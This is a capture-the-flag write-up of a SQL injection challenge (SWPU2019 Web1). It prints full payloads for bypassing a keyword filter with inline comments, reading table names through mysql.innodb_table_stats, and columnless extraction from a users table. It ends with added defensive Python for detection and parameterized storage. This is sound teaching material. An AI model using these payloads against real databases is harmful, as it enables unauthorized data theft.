[SWPU2019]Web1
2022-08-05 03:59:00 【pakho_C】
Trying to register as admin shows that the account already exists, but brute-forcing its password yields nothing.
Register a test account and log in.
Apply to post an advertisement.
Attempt injection there.
Entering a single quote produces an error,
so an injection point exists; try a universal-password payload.

There is filtering. Fuzzing is impractical because the number of submissions is limited and duplicate ad titles are rejected,
so testing has to be done by hand. Keywords such as or, order, floor, updatexml, #, -- are filtered and spaces are stripped automatically; inline comments (/**/) can be used in place of spaces to bypass that.
Since "or" is filtered, information_schema cannot be used (its name contains "or"), so only columnless injection is possible; see: SQL injection without column names.
1. Use group by to find the number of columns:
1'/**/group/**/by/**/22,'1
1'/**/group/**/by/**/23,'1
The first succeeds and the second fails, so there are 22 columns.
2. Use a union query to find the echo points: -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1
The echo points are columns 2 and 3.
When looking up table names, "or" is filtered and cannot be bypassed by changing case or double-writing the keyword, so information_schema cannot be used because its name contains "or". There are two ways around this:
InnoDB engine
Since MySQL 5.5.8, InnoDB has been the default storage engine. In MySQL 5.6 and above, InnoDB adds two tables, innodb_index_stats and innodb_table_stats, both of which store information about databases and their tables, but not column names.
sys database
MySQL 5.7 and above adds a sys database. Its base data comes from information_schema and performance_schema; it stores no data of its own. Table names can be obtained from its schema_auto_increment_columns view.
Note: the sys database requires root privileges to access. innodb is disabled by default in mysql.
3. Use the InnoDB statistics table to bypass the filter and read the table names: -1'union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()&&'1'='1
This returns the table names ads and users.
4. Use columnless injection to read the second field of the users table:
-1'/**/union/**/select/**/1,(select/**/group_concat(`2`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1
Note: the column count in the inner "select 1,2,3" is found by trial; if it does not match the users table, an error message says so.
Testing shows the users table has 3 columns.
The results include the name flag, so the flag is the first value in the third field.
Change the queried column to 3:
-1'/**/union/**/select/**/1,(select/**/group_concat(`3`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1
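The challenge's filter fails because it blacklists bare words and strips spaces, which inline comments defeat. As an added example (not part of the original writeup), the following Python shows the defender's side: normalize away the /**/ obfuscation, match structural patterns from this writeup (union select, group-by probing, mysql.innodb_table_stats, the backtick-ordinal columnless trick) instead of bare words so benign titles containing "or" still pass, and store the title with a parameterized INSERT, which is the actual fix. Sample titles, the sqlite3 schema and function names are constructed for illustration.

```python
import re
import sqlite3

# Constructed sample ad titles: payloads from this writeup plus two benign
# titles that a naive keyword blacklist ("or", "floor") would wrongly reject.
SAMPLE_TITLES = [
    "1'/**/group/**/by/**/22,'1",
    "-1'union/**/select/**/1,2,group_concat(table_name),4/**/from/**/"
    "mysql.innodb_table_stats/**/where/**/database_name=database()&&'1'='1",
    "-1'/**/union/**/select/**/1,(select/**/group_concat(`2`)/**/from/**/"
    "(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)n),3&&'1'='1",
    "Summer sale: order now and floor prices drop",
    "Mentor program for new editors",
]

def normalize(s):
    """Undo the obfuscations used here: inline comments as whitespace,
    collapsed spacing and mixed case."""
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)   # /**/ becomes a space
    s = re.sub(r"\s+", " ", s)                      # collapse whitespace
    return s.lower()

# Structural patterns, not bare words: a bare-word blacklist breaks benign
# text and is exactly what the challenge's filter relied on.
PATTERNS = [
    ("union_select", re.compile(r"\bunion\s+select\b")),
    ("group_by_probe", re.compile(r"'\s*group\s+by\s+\d+\s*,")),
    ("innodb_stats", re.compile(r"\bmysql\.innodb_(table|index)_stats\b")),
    ("sys_autoinc", re.compile(r"\bsys\.schema_auto_increment_columns\b")),
    ("backtick_ordinal", re.compile(r"`\d+`")),     # columnless `2`, `3` trick
    ("tautology", re.compile(r"'\d+'\s*=\s*'\d+")), # trailing '1'='1
]

def classify(title):
    """Return the names of the patterns matched after normalization."""
    n = normalize(title)
    return [name for name, rx in PATTERNS if rx.search(n)]

def store_title(conn, title):
    """The real mitigation: a parameterized INSERT keeps any payload inert
    as data. Returns the stored value so the round trip can be checked."""
    conn.execute("CREATE TABLE IF NOT EXISTS ads (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO ads (title) VALUES (?)", (title,))
    return conn.execute("SELECT title FROM ads ORDER BY id DESC LIMIT 1").fetchone()[0]
```

Detection like this belongs in logging and alerting on ad submissions; it is not a substitute for the parameterized query.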